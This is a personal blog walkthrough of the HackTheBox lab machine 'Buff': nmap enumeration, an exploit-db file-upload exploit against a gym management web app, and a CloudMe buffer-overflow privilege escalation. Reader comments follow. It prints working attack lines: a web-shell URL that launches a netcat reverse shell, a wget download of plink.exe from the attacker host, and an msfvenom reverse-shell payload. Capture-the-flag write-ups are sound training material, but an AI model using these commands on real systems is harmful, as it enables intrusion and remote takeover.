Blog

Buff hackthebox walkthrough

Buff hackthebox walkthrough

Hey there! This is Shreya and today I am gonna show you how to pwn buff from hackthebox. Buff is an easy level windows machine having a straightforward way to obtain initial foothold. Privilege escalation to Administrator requires to abuse a service that has its exploit available on exploit-db, still its tricky to get through.

With that being said, let’s get started.

Enumeration

Starting with nmap scan, I found only one open port.

# nmap -sC -sV -oA buff.nmap 10.10.10.198

Nmap scan report for 10.10.10.198
Host is up (0.53s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Jul 26 11:45:15 2020 -- 1 IP address (1 host up) scanned in 83.46 seconds

Going up there on http://10.10.10.198:8080 , A page landed

About fitness

The application had a lots of clickable links. I thought it would be sql injection but it wasn’t. But I saw something in the application’s footer.

The project seems to be taken from projectworlds.in

I googled for term About Fitness projectworld.in and got the one that I was really interested in. It was gym management system having the same functionalities/UI/UX that we had in our vulnerable box.

https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/

Next, I searched the google if I could find any exploits for this project and you guess it right. I found one on exploit-db

https://www.exploit-db.com/exploits/48506

I copied the exploit to my kali machine and ran the exploit.

# python exploit.py http://10.10.10.198:8080/

And I got the shell, but it was not good enough. So I read the specifics of exploit to find out what exactly is happening. Here, the upload directory didnt had any authorization check and anybody could access it. Also, there was a file upload vulnerability that can lead to RCE by crafting a malicious php payload that bypasses all the file upload filters.

The exploit is uploading a malicious payload in kamehameha.php under /upload having the get parameter as telepathy.

Run the following url and open up a netcat listener on the port specified in the nc.exe command ( nc.exe is already present in the current directory thats accessible.)

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc.exe 10.10.14.32 4444 -e cmd.exe

And we got the user directly! Awesome!! Lets grab the user.txt

Privilege escalation

I fired up winPEAS.exe and the terminal was flowing with results! It was really difficult to find stuff that could really lead to privilege escalation.

After a bit of searching manual searching in directories, I found that cloudme_1112.exe was present inside C:\Users\shaun\Downloads. It seemed to be an interesting file.

I googled for cloudme_1112 exploit and luckily found one here!!!

The exploit says run the service followed by executing the script. The payload corresponding to your port and ip has to be generated via msfvenom.

The service is listening on 127.0.0.1:8888, as can be seen when netstat -ano is executed.

The exploit is written in python, but unfortunately we dont have python present on the box. So there are 2 ways in which we can run our exploit

  1. Convert the python exploit into the .exe that can be exeuted directly on the vulnerable windows machine.
  2. Open a reverse connection using plink that forwards remote port over the local address.

I’ll be showing you the second method.

Very first, we need to download the plink.exe. It can be found here.

Upload plink.exe to windows machine.

PS> wget http://10.10.14.37/plink.exe -o plink.exe

Now run the following command on windows to forward 127.0.0.1:8888 (where the service is running) to 127.0.0.1:8888 (on the attacker machine)

PS> plink.exe -l root -pw toor  10.10.14.32 -R 8888:127.0.0.1:8888

Now run netstat on attacker machine to see if 127.0.0.1:8888 is listening

Yes it is!! and that’s great. Next up, the payload has to be created using msfvenom to get a reverse shell.

On attacking machine, execute the following

# msfvenom  -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.37 4444 -e cmd.exe' -b '\x00\x0a\x0d' -f py -v payload

This will generate a payload that needs to be replaced with the one that is already present in the exploit script.

Now open up a nc listener on port 4444 ( as it is specified in the msfvenom payload) and simply execute the python script ( do it atleast 3-4 times until you get a shell).

This will execute as if we the executing the script on the windows box and we get a reverse shell on the listener.

The administrator is now owned!!! Go grab the root.txt

That’s all from the blog post! Thanks for reading.
See you in the next one. Until then, happy hunting!!!

Tags: , , , , , , ,

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

This Post Has 4 Comments

  1. WWW.XMC.pl 27 Nov 2020 Reply

    When you write your life stories, don’t let anyone else keep the pilots

  2. WWW.XMC.PL 27 Jan 2021 Reply

    Great stuff.Id like to suggest taking a look at things like cheese. What do you think?

  3. yuhisern 2 Feb 2021 Reply

    Awesome writeup girl, thanks for additional information.

  4. Lillie 17 Mar 2021 Reply

    We’re a group of volunteers and starting a new scheme in our community.
    Your website offered us with valuable info to work on. You’ve done an impressive
    process and our entire neighborhood will be grateful to you.

Leave a Reply